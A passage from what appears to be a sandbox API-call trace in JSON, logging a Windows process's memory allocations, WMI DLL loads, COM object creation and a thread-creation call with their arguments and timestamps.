"arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9df000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 35 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c106000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 36 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9e1000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 37 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9e3000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 38 }, { "timestamp": "2025-11-20 10:58:31,647", "thread_id": "1388", "caller": "0x7ff79aafc1ff", "parentcaller": "0x7ff79aafb518", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c10b000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 39 }, { "timestamp": "2025-11-20 10:58:33,725", "thread_id": "1388", "caller": "0x7ff79aafb555", "parentcaller": "0x7ff79aafc77a", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\wbemprox" }, { "name": "DllBase", "value": "0x7ffedc850000" } ], "repeated": 0, "id": 40 }, { "timestamp": "2025-11-20 10:58:33,725", "thread_id": "1388", "caller": "0x7ff79aafb555", "parentcaller": "0x7ff79aafc77a", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wbemprox.dll" }, { "name": "BaseAddress", "value": "0x7ffedc850000" } ], "repeated": 0, "id": 41 }, { "timestamp": "2025-11-20 10:58:33,725", "thread_id": "1388", "caller": "0x7ff79aafb555", "parentcaller": "0x7ff79aafc77a", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4590F811-1D3A-11D0-891F-00AA004B2E24" }, { "name": "ClsContext", "value": "0x00000005", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER" }, { "name": "riid", "value": "00000000-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 42 }, { "timestamp": "2025-11-20 10:58:33,725", "thread_id": "4244", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9ee000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 43 }, { "timestamp": "2025-11-20 10:58:33,725", "thread_id": "4244", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000002b0" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 44 }, { "timestamp": "2025-11-20 10:58:33,725", "thread_id": "4244", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9ef000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 45 }, { "timestamp": "2025-11-20 10:58:33,725", "thread_id": "4244", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9f1000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 46 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "1388", "caller": "0x7ff79aafb5bc", "parentcaller": "0x7ff79aafc77a", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "0000032A-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "00000149-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 47 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "1388", "caller": "0x7ff79aafb5bc", "parentcaller": "0x7ff79aafc77a", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000339-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 48 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "1388", "caller": "0x7ff79aafb5bc", "parentcaller": "0x7ff79aafc77a", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\wbemsvc" }, { "name": "DllBase", "value": "0x7ffed94f0000" } ], "repeated": 0, "id": 49 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "1388", "caller": "0x7ff79aafb5bc", "parentcaller": "0x7ff79aafc77a", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wbemsvc.dll" }, { "name": "BaseAddress", "value": "0x7ffed94f0000" } ], "repeated": 0, "id": 50 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "1388", "caller": "0x7ff79aafb5bc", "parentcaller": "0x7ff79aafc77a", "category": "com", "api": "CoCreateInstanceEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "8BC3F05E-D86B-11D0-A075-00C04FB68820" }, { "name": "ClsContext", "value": "0x00000014", "pretty_value": "CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER" }, { "name": "ServerName", "value": "" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 51 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "1388", "caller": "0x7ff79aafb5bc", "parentcaller": "0x7ff79aafc77a", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\fastprox.dll" }, { "name": "BaseAddress", "value": "0x7ffed3fc0000" } ], "repeated": 0, "id": 52 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "1388", "caller": "0x7ff79aafb5bc", "parentcaller": "0x7ff79aafc77a", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 53 }, { "timestamp": "2025-11-20 10:58:33,741", "thread_id": "1388", "caller": "0x7ff79aafdafb", "parentcaller": "0x7ff79aafb615", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4590F812-1D3A-11D0-891F-00AA004B2E24" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 2, "id": 54 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "1388", "caller": "0x7ff79aafb1d8", "parentcaller": "0x7ff79aafb33c", "category": "threading", "api": "CreateRemoteThreadEx", "status": true, "return": "0x000002cc", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "StartRoutine", "value": "0x7ff79aafb120" }, { "name": "Parameter", "value": "0x21e2b9f5280" }, { "name": "CreationFlags", "value": "0x00000000" }, { "name": "ThreadId", "value": "4280" }, { "name": "ProcessId", "value": "3164" } ], "repeated": 0, "id": 55 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "1388", "caller": "0x7ff79aaf8469", "parentcaller": "0x7ff79aaf9b59", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9fa000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 56 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "1388", "caller": "0x7ff79aafa124", "parentcaller": "0x7ff79aafb77b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9fc000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 57 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee336ef53", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000002fc" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 58 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9fe000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 59 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2b9ff000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 60 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000338-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 61 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba02000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 62 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba03000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 63 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba04000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 64 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 65 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffed3feaddd", "parentcaller": "0x7ffed3fea3b7", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 66 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ff79aaff038", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\wmiutils" }, { "name": "DllBase", "value": "0x7ffedc210000" } ], "repeated": 0, "id": 67 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ff79aaff038", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wmiutils.dll" }, { "name": "BaseAddress", "value": "0x7ffedc210000" } ], "repeated": 0, "id": 68 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ff79aaff038", "parentcaller": "0x00000000", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 69 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee10f6f4c", "parentcaller": "0x7ffee2f66d2f", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000002f4" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 70 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba09000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 71 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 72 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ff79aaf8469", "parentcaller": "0x7ff79aaf19c9", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba0c000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 73 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ff79aaf1cb2", "parentcaller": "0x7ff79aaf1a68", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba0d000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 74 }, { "timestamp": "2025-11-20 10:58:33,757", "thread_id": "4248", "caller": "0x7ff79aaf1cb2", "parentcaller": "0x7ff79aaf1a68", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4590F812-1D3A-11D0-891F-00AA004B2E24" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 75 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "4248", "caller": "0x7ff79aaf4e98", "parentcaller": "0x7ff79aaf1ab3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba0f000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 76 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "4248", "caller": "0x7ff79aaf4e98", "parentcaller": "0x7ff79aaf1ab3", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 77 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "4248", "caller": "0x7ff79aaf4ef3", "parentcaller": "0x7ff79aaf1ab3", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba11000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 78 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "4248", "caller": "0x7ff79aaf56cb", "parentcaller": "0x7ff79aaf5514", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\powrprof" }, { "name": "DllBase", "value": "0x7ffee09f0000" } ], "repeated": 0, "id": 79 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "4248", "caller": "0x7ff79aaf56cb", "parentcaller": "0x7ff79aaf5514", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\framedynos" }, { "name": "DllBase", "value": "0x7ffeca3f0000" } ], "repeated": 0, "id": 80 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "4248", "caller": "0x7ff79aaf56cb", "parentcaller": "0x7ff79aaf5514", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\wbem\\cimwin32" }, { "name": "DllBase", "value": "0x7ffec3810000" } ], "repeated": 0, "id": 81 }, { "timestamp": "2025-11-20 10:58:33,772", "thread_id": "4248", "caller": "0x7ff79aaf56cb", "parentcaller": "0x7ff79aaf5514", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\UMPDC" }, { "name": "DllBase", "value": "0x7ffee09d0000" } ], "repeated": 0, "id": 82 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79aaf56cb", "parentcaller": "0x7ff79aaf5514", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\cimwin32.dll" }, { "name": "BaseAddress", "value": "0x7ffec3810000" } ], "repeated": 0, "id": 83 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79aaf56cb", "parentcaller": "0x7ff79aaf5514", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "D63A5850-8F16-11CF-9F47-00AA00BF345C" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "00000001-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 84 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79aaf998d", "parentcaller": "0x7ff79aaf899b", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E" }, { "name": "ClsContext", "value": "0x00000005", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER" }, { "name": "riid", "value": "00000001-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 85 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79aaf7ab2", "parentcaller": "0x7ff79aaf5b48", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 86 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79aafe7c7", "parentcaller": "0x7ff79aafe590", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba14000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 87 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ffed3fea4f0", "parentcaller": "0x7ffed3fea195", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 88 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba17000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 89 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ffed3feaddd", "parentcaller": "0x7ffed3fea3b7", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 90 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 1, "id": 91 }, { 